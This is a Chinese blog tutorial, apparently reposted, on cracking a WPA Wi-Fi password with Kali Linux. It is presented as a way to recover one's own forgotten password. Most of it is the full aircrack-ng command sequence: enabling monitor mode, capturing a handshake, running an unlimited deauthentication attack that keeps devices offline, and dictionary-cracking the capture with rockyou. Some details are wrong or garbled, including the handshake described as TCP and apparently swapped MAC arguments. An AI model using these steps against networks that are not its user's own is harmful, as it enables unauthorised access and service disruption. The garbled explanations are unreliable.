Kali Linux破解wifi密码教程(无须外置网卡)
如果家里还有设备能连上wifi,如果想要找回密码,可以使用kali linux试试
这里默认大家是有笔记本电脑的,且有USB启动优盘,比如kalilinux-livecd
首先,从kalilinux启动
然后给root设置一个密码
给root用户设置密码并使用步骤如下:
1、输入sudo passwd root命令,设定root用户密码。
系统就会提示:Name or service not know.下一行即可以修改自己的root密码
(注意:输入密码的时候,你输的密码是看不到的,一定要记住自己输的密码)
两遍密码输完后回车,系统会提示“passwd:passwd updated successfully”这说明密码修改成功
2、设定root密码成功后,输入su命令,并输入刚才设定的root密码,就可以切换成root了。
提示符$代表一般用户,提示符#代表 root用户。
破解试验:
命令ifconfig查看网卡信息,有wlan0表示网卡能够用来破解wifi。
root@kali:~# ifconfig
airmon-ng
使用命令airmon-ng start wlan0开启网卡监听模式。
root@kali:~# airmon-ng start wlan0
.iwconfig
使用iwconfig命令查看网卡信息, wlan0mon网卡名加了mon则表示’监听模式’开启成功
root@kali:~# iwconfig
airodump-ng扫描
使用命令airodump-ng wlan0mon,开始扫描WiFi,按ctrl+c结束任务。
root@kali:~# airodump-ng wlan0mon
抓包
接着输入airodump-ng –bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon。注,–bssid后面跟着的是’BSSID(MAC地址)’,-c后面跟着的是’CH(信道)’,-w后面跟着抓到的包保存到哪,最后是网卡信息’wlan0mon’。
如:我想要破解ESSID为TP-LINK_961A4A的无线wifi,格式为:
root@kali:~# airodump-ng --bssid 38:83:45:96:1A:4A -c 6 -w /opt/catchWiFi wlan0mon
数据包已经正在抓取,等待一会,如果抓取不到数据.接着往下看
另外打开一个终端,输入格式为’airepaly-ng -0 0 -c STATION(任选其一) -a bssid 网卡名(一般为wlan0mon)’。不过STATION最好选择手机的热点,如果不清楚手机的mac地址那么可以任选其一,选择手机的好处是可以手动设置断线,让其抓取到包。如果运气不好,那么就试四个把。
如:我想要攻击STATION(MAC地址)为,格式为:
root@kali:~# aireplay-ng -0 0 -c 38:83:45:96:1A:4A -a 14:95:CE:BB:53:A8 wlan0mon
每个参数的意义
(0 WiFi设备无限次数,-0 8则攻击8次。攻击原理是:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送tcp包(里面包含加密的密码数据),我方伪装成WiFi热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码,
数据包里面的密码是哈希加密的,哈希加密只能正向)
当’airodump-ng –bssid BSSID’窗口出现WPA handshake时,表示抓包成功。这里有一个小技巧让其抓到包,让手机连接的wifi断开,然后重新连接wifi。简单说,把手机WiFi重新关开即可。
出现’WPA handshake时’时,需要让两个终端都按Ctrl+c停止,不然会一直断网的。
查看抓到的数据包.cd/opt/打开抓包的目录,ls列出来,就看到我们抓到的数据包
解压kali字典文件
解压kali自带的字典文件.路径:/usr/share/wordlists/rockyou.txt.gz
root@kali:~# gzip -d/usr/share/wordlists/rockyou.txt.gz
跑包(破解密码)
格式:aircrack-ng -w 字典路径 握手包路径,回车后开始爆破。
运气有一些差,抓到了三个cap包,一个没跑成功。但是怎么能放弃,毛主席说过,没有条件创造条件。如果抱着一定要跑出来的决心,就接着往下看。
root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt /opt/catchWifi-01.cap root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt /opt/catchWifi-02.cap root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt /opt/catchWifi-03.cap
转载请注明:落伍老站长 » 家里WIFI密码忘记了,又不想重置路由器怎么办?